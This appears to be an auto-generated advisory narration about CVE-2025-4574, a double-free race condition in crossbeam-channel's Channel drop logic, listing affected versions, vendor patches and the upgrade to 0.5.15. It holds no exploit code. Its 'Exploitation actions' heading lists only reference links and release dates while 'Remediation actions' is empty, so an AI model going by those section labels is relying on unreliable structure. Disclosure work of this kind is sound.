crossbeam-channel: double-free race condition in crossbeam-channel Rust crate (CVE-2025-4574) #shorts

Summary

Welcome to today’s security update. We’re discussing CVE-2025-4574, a recently disclosed vulnerability in the crossbeam-channel crate for Rust. First published on May 13, 2025 and updated through May 21, it involves a race condition in the channel drop logic leading to a possible double-free and memory corruption. Fedora 41 has already shipped a fix in the python-watchfiles package, and Red Hat has pushed updates across multiple enterprise products.

Product details

crossbeam-channel is a popular Rust library that provides multi-producer, multi-consumer channels for thread communication. Version 0.5.12 and any release prior to 0.5.15 are affected. Fedora 41 maintainers updated the python-watchfiles package—which depends indirectly on crossbeam-channel—to pull in the fixed version. Red Hat has similarly issued patches for Directory Server, Enterprise Linux versions 7 through 10, OpenShift Container Platform 4, Satellite 6 and other components.

Vulnerability type summary

This issue is classified as a double-free vulnerability caused by a race condition. In concurrent code, if two threads trigger the channel’s drop logic simultaneously, the same memory region can be freed twice. Double-free bugs can lead to memory corruption, application crashes, and in some cases can be leveraged for arbitrary code execution.

Details of the vulnerability

The flaw resides in the internal Channel type’s Drop implementation. When a Channel instance is dropped, cleanup code deallocates shared buffers. Under heavy concurrency, however, two threads can reach that cleanup path at the same time for the same channel object. Because Rust’s ownership rules are bypassed in the unsafe cleanup code, the buffer is freed twice. The result is undefined behavior: memory may be corrupted, denials of service can occur, and attackers with control over threaded workloads could potentially hijack execution flow.

Conclusion

To remediate, upgrade crossbeam-channel to version 0.5.15 or later. Fedora 41 users should install the updated python-watchfiles package immediately. Red Hat customers should apply the vendor patches for their affected products. Developers of Rust crates and downstream projects should audit their dependencies for the fixed release and update accordingly. That wraps our coverage of CVE-2025-4574—thanks for listening, and stay secure.

This chain involves the following actors

• Attacker: Exploits the race condition to corrupt memory
• Rust Developer: Maintains code using crossbeam-channel
• Fedora 41 User: Runs python-watchfiles built on the vulnerable crate

This following systems are involved

• crossbeam-channel (Provides thread communication channels): Contains the internal Channel type with a flawed drop method
• python-watchfiles (Fedora 41) (Monitors file system changes): Bundles the vulnerable crossbeam-channel version
• Rust Application (Executes user-land code using channels): Host environment for the race-to-free exploit

Attack entry point

• Channel Drop Method: A race condition in the destructor of the internal Channel type can free the same memory twice.

Remediation actions

Exploitation actions

• https://access.redhat.com/security/cve/CVE-2025-4574
• https://bugzilla.redhat.com/show_bug.cgi?id=2358890
• https://github.com/crossbeam-rs/crossbeam/pull/1187
• [2025-05-23] Fedora 41 releases a security fix for CVE-2025-4574 in python-watchfiles package.
• [2025-06-14] Fedora 41 release includes improvements, fixes, and updates to address CVE-2025-4574.
• [2025-06-14] Fedora 41 release includes improvements, fixes, and updates crossbeam-channel dependency to address CVE-2025-4574.